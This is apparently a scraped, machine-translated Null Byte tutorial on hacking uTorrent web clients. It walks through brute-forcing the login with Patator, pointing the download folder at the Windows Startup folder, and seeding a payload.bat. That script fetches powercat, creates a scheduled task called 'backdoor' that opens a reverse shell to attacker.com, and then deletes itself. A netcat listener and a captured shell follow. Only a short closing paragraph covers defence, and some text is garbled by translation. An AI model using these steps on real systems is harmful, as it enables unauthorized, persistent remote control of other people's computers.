قالب وردپرس درنا توس
Home / Tips and Tricks / How to hack uTorrent clients and backdoor the operating system «Null Byte :: WonderHowTo

How to hack uTorrent clients and backdoor the operating system «Null Byte :: WonderHowTo



Committed uTorrent clients can be misused to download a malicious torrent file. The malicious file is designed to embed and execute a persistent back door when Windows 10 is restarted, allowing the attacker remote access to the operating system at will. But there are a few ways to prevent you from being a target.

Torrent clients such as uTorrent and Transmission have built-in functions that allow server administrators to access the torrent client remotely via web application interfaces, as shown in the uTorrent web app example below

In general, the number of publicly accessible torrent clients is growing. As torrent clients grow in popularity, so does the number of poorly configured and insecure services. Just like all web apps, these clients can be hacked in different ways. For example, in recent years numerous directory traversal, escalation of privileges and cross-site scripting vulnerabilities have been disclosed, as shown in the image below. In the future, attackers might discover ways to completely bypass authentication.

Understanding the attack

So a torrent client is being hacked … what's the worst thing that an attacker can do? Pirate some copyrighted materials? Well, but it's getting worse. Torrent clients can create files and folders on the system and replace existing files. That access to the file system can be misused by downloading malicious files through the compromised torrent client.

For example, an attacker could download an executable file or script to the start folder on Windows 10 computers, as shown in the GIF below. The boot folder executes all the files it detects without user interaction – every time the server or computer is restarted.

Change the default download folder in a hacked uTorrent client.

Linux systems are equally vulnerable to such attacks, but are beyond the scope of our demonstration here. The .bashrc file found in most Linux systems is essentially a Bash script that runs every time a new terminal is opened or SSH login is set. An attacker could use the compromised torrent client to download a malicious .bashrc file, replacing the original file found on the server. It would cause the .bashrc server to run from the attacker when someone successfully logs on to the server.

This article shows how uTorrent web apps can be brutally forced and used to download a PowerShell script into the Windows 10 startup folder. The PowerShell script is designed to embed a persistent back door and remove themselves immediately when completed.

Step 1: Brute Force the Login with Patator

As research suggests, most passwords are six to eight characters long. Weak passwords can allow attackers to guess the uTorrent login password and manipulate files on the server.

Patator is a brute forcing tool, such as Hydra, Medusa, and Burp & # 39; s Intruder module. The use of Patator for brute-force logging in of web apps is very similar to brute-forcing router gateways. In my previous article, "Break in Router Gateways with Patator", the use of the command line and examples are described in detail.

1. Install Patator

To start, install Patator with the following command if it is not yet installed. In full versions of Kali Linux, Patator may already be on the system.

  ~ # apt-get update && apt-get install patator

Read package lists ... Ready
Build dependency structure
Read status information ... Done
The following NEW packages are installed:
ca-certificates-java standard-jre standard-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libferdep-client2-2
libfeerdep2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-naclon python3-naclon python
python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Must have 43.9 MB of archives.
After this operation, an additional 192 MB of disk space is used.
Do you want to continue? [Y/n] Y 

2. Record a logon request with Burp & # 39; s proxy

Open Firefox and Burp Suite. Configure Firefox for proxy requests via Burp and record the login request. Replace the encrypted string "Authentication: Basic" with "FILE0", right click on it and choose the "Copy to file" option. The FILE0 string acts as a placeholder for the Patator glossary. Save the request in the / tmp folder with the file name "utorrent_request.txt".

3. Generate a targeted word list

Hashes.org has published word lists with cracked passwords obtained in the last two years. The 2018 glossary, highlighted in the image below, can be downloaded by navigating to the website. That is the one we use as an example in this guide.

Unpack the archive with the 7z x archive.7z command, where "archive" is the folder and file name of the compressed file that you have downloaded. For example:

  ~ # 7z x /root/Downloads/hashes.org-2018.7z

7-Zip [64] 16.02: Copyright (c) 1999-2016 Igor Pavlov: 2016-05-21
p7zip version 16.02 (locale = en_US.UTF-8, Utf16 = on, HugeFiles = on, 64 bits, 4 CPU & # 39; s Intel (R) Core (TM) i7-4770HQ CPU @ 2.20GHz (40661), ASM, AES-NI)

Scan the disk for archives:
1 file, 1424620615 bytes (1359 MiB)

Extract the archive: /root/Downloads/hashes.org-2018.7z
-
Path = /root/Downloads/hashes.org-2018.7z
Type = 7z
Physical size = 1424620615
Size headers = 142
Method = LZMA: 24
Solid = -
Blocks = 1

Everything is alright

Size: 6429547050
Compressed: 1424620615 

Then code each line in the dictionary with base64. The username "admin" is the default name for uTorrent web apps. Exchange the "./hashes.org-2018.txt" folder with the location and name of your downloaded glossary.

  ~ # while password is being read; do printf "admin: $ password" | base64; done < ./hashes.org-2018.txt >> ./ base64_wordlist.txt 

4. Brute Force with Patator

In my tests against uTorrent version 3.5.5 in Windows 10, no blacklist or speed limitation seemed to have been invoked by hundreds of thousands of failed login attempts. It seems that uTorrent allows an infinite number of login attempts over a longer period.

Use the patator command below with the utorrent_request.txt file created to brutally force uTorrent weblogins. of this step. Make sure you replace the paths below to the correct folder, because yours may be different.

  ~ # patator http_fuzz raw_request = / tmp / utorrent_request.txt accept_cookie = 1 follow = 1 0 =. / Base64_wordlist.txt

16:31:45 patator INFO - Patator v0.7 (https://github.com/lanjelot/patator) starting on 2020-01-29 16:31 EST 

To abort that command:

  • raw_request = – Use the utorrent_request.txt created in an earlier step to generate login attempts against the web app.
  • accept_cookie = – Save cookies that you receive for future requests.
  • follow = – Follow location redirects for both failed and successful login attempts when instructed by the server.
  • 0 = – The "FILE0" designation in utorrent_request.txt runs through the offered password list.

After executing the command, my output looks like this:

  code size: clen time | candidate | number of mesg
-------------------------------------------------- ---------------------------
401 159: 0 0.004 | YWRtaW46ISEhbWFmZWlmZWkxMjM0NQ == | 9902 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbWFydGluYTk1 | 9912 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbWVpbnMhISE = | 9922 | HTTP / 1.1 401 Not authorized
401 159: 0 0.007 | YWRtaW46ISEhbWljaCEhIQ == | 9932 | HTTP / 1.1 401 Not authorized
401 159: 0 0.001 | YWRtaW46ISEhbW9t | 9942 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbmFpY3VMISEh | 9952 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbmV3d2F2ZQ == | 9962 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbm93YXk = | 9972 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhb29vNTIx | 9982 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhcGluayEhIQ == | 9992 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbWFyeTEyMw == | 9913 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbWVsbDI3ODE = | 9923 | HTTP / 1.1 401 Not authorized
401 159: 0 0.001 | YWRtaW46ISEhbWljaGVsbGU = | 9933 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbW9uZXk = | 9943 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbmFtYXN0ZTIy | 9953 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbmlhaXdvYnU = | 9963 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbndseTAy | 9973 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhb3N0YXAhISE = | 9983 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhcGlwa2EyMDA0ISEh | 9993 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbWFzY3VsaW5vISEh | 9915 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbWVuZzEyMw == | 9925 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbWluaW9uNTg = | 9935 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbXVja2VsMDgxNQ == | 9945 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbmFuZGExOTk1 | 9955 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbmlja2k = | 9965 | HTTP / 1.1 401 Not authorized
401 159: 0 0.000 | YWRtaW46ISEhbzc3M2g = | 9975 | HTTP / 1.1 401 Not authorized
200 42340: 42176 0.073 | YWRtaW46UGFTU3dvUkRAMTIzNA == | 9985 | HTTP / 1.1 200 OK
401 159: 0 0.004 | YWRtaW46ISEhcG9wOTI = | 9995 | HTTP / 1.1 401 Not authorized
Hits / Done / Skip / Fail / Size: 10000/10000/0/0/10000, Avg: 1607 r / s, Time: 0 h 0 m 6 s 

Failed login attempts can be filtered out. Successful registrations can be decoded with base64 . For example:

  ~ # base64 -d <<< & # 39; YWRtaW46UGFTU3dvUkRAMTIzNA == & # 39;

admin: PaSSwoRD @ 1234 

Step 2: Change the default download folder

After accessing the torrent client, if there are no active downloads, simply add a torrent file and click on the " General "to identify the user name on the Windows system. The torrent can be removed after the username is discovered.

Open the "Preferences" and click on the "Folders" tab. Check the "New downloads in" button and enter the next boot folder.

  C:  Users    AppData  Roaming  Microsoft  Windows  Start Menu  Programs  Startup 

Make sure that you have [19659049] with the Windows 10 username.

Step 3: Create the Payload.bat

The PowerShell script (payload.bat) will have a persistent back door with the command schtasks and remove the proof of itself from the Startup folder.

This is just an example of a PowerShell payload. The script can perform a wide range of automated attacks, such as sensitive file filtration, desktop live streaming, password dumping and converting the device to a web proxy.

There are several rules in the PowerShell payload below. Comments have been added to explain what each rule does.

  # A new folder is created with the name "Windows" in an attempt to
# hide a malicious script.
mkdir "C:  Users  $ env: username  Windows"

# Invoke-WebRequest is used to download Powercat, a Netcat-like one
# PowerShell module. The Powercat script is stored in the
# new folder "Windows".
iwr & # 39; https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1&#39; -O C:  Users  $ env: username  Windows  powercat.ps1

# The schtasks command is executed to create a new scheduled task
# called "back door". The task imports the Powercat script
# and try to establish a TCP connection to the attacker's system
# every time the Windows 10 computer becomes inactive.
schtasks / create / f / tn backdoor / tr & # 39; powershell / w 1 -ep bypass / C ipmo C:  Users  $ env: username  Windows  powercat.ps1; powercat -c attacker.com -p 9999 -e powershell & # 39; / sc onidle / i 1

# The payload.bat is deleted from the boot folder.
rm C:  Users  $ env: username  AppData  Roaming  Microsoft  Windows  Start` Menu  Program & # 39; s  Startup  payload.bat 

Create a folder named "torrent" with the command mkdir .

  ~ # mkdir torrent / 

Go to the new folder.

  ~ # cd torrent /
~ / torrent # 

The above payload is summarized in one line, chained together by semicolons & # 39; s, with which Windows 10 can execute all desired code neatly as a single command.

Use nano to create a new "payload.bat" file:

  ~ / torrent # nano payload.bat 

And save the PowerShell script below in the file:

  powershell -ep bypass / w 1 "& mkdir C:  Users  $ env: username  Windows; iwr & # 39; https: //raw.githubusercontent.com/besimorhino/powercat/master/powercat. ps1 & # 39; -OC:  Users  $ env: username  Windows  powercat.ps1; schtasks / create / f / tn backdoor / tr & # 39; powershell / w 1 -ep bypass / C ipmo C:  Users  $ env: username  Windows  powercat.ps1; powercat -c attacker.com -p 9999 -e powershell & # 39; / sc onidle / i 1; rm C:  Users  $ env: username  AppData  Roaming  Microsoft  Windows  Start` Menu  Programs & # 39; s  Startup  payload.bat "

Note the serious accent (` ) in the "Start` Menu" file path. This is not a typo. The serious accent character is a solution to escape from spaces.

Step 4: Create the Torrent file

Download the qbittorrent client in a new terminal window in Kali. Most torrent applications allow torrent creation, but the transmission gtk client could not create the .torrent file in my tests, so it is not recommended.

  ~ # apt-get update && apt-get install qBittorrent

Hit: 1 https://mirrors.ocf.berkeley.edu/kali kali-rolling InRelease
Read package lists ... Ready
Read package lists ... Ready
Build dependency structure
Read status information ... Done
The following NEW packages are installed:
libboost-random1.67.0 libtorrent-rasterbar9 qbittorrent
0 upgraded, 3 newly installed, 0 to remove and 185 not upgraded.
Must have 7,051 kB of archives.
After this operation, 15.2 MB of additional disk space is used.
Do you want to continue? [Y/n] 

Open qBitttorrent. Click the "Extra" button in the menu bar and then "Torrent Creator" to open the Torrent Creator window.

Change the path to the payload.bat file, check the "Start seeding immediately" button, add tracker URL & # 39; s and click on the "Create Torrent" button.

Step 5: Import the Torrent file [19659007] In the hacked uTorrent client, click the "Add Torrent" button in the upper left corner Import the payload.bat.torrent created in the previous step.

The payload.bat contains only a small PowerShell liner, so this e must be downloaded within a few seconds. In Windows 10, which is not yet accessible to the hacker, the payload.bat can be found in the Startup folder.

Payload.bat downloaded via the uTorrent client and stored in the boot folder.

The next time Windows 10 is restarted, payload.bat executes the script. With virtual private servers, it can be difficult to be the target to restart the system. Various ideas for achieving this are described later in the article.

Step 6: Start the Netcat Listener

In Kali, the following netcat command can be used to open a listener ( – l ) on port ( -p ) 9999. The listener must intercept the connection from the Powercat command embedded in the Windows 10 task scheduler. The port number can be changed, but must match the Powercat port used in the payload.bat.

  ~ # nc -v-1 -p 9999

listen on [any] 9999 ... 

Step 7: restart the server

Windows 10 laptops on a local network can be more easily provoked to restart. With virtual private servers, it can take days, weeks or even months before the target server or computer is restarted. It is unusual for system administrators to reboot a remote system for no reason.

Below are several methods that can cause a user or administrator to restart the operating system.

Step 8: Post-Exploitation

If the attack was successful, the .bat payload would be removed from the startup folder and a new TCP connection will be made to the attacker's system every time the Windows computer is idle becomes unattended for one minute.

  ~ # nc -v-1 -p 9999

listen on [any] 9999 ...
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:  Windows  system32> 

Preventing this type of attack

As an avid torrent application user, remote access to the client makes downloading new content very easy. But such web apps need to be properly enhanced with security solutions such as Nginx, SSH port-forwarding or Tor ui services to prevent unobstructed brute-force attacks and full client access from the internet.

Until the next time, follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or send me a message if you have any questions.

Don't miss it: More Null Byte guides about hacking Windows 10

Cover photo and screenshots of tokyoneon / Null Byte




Source link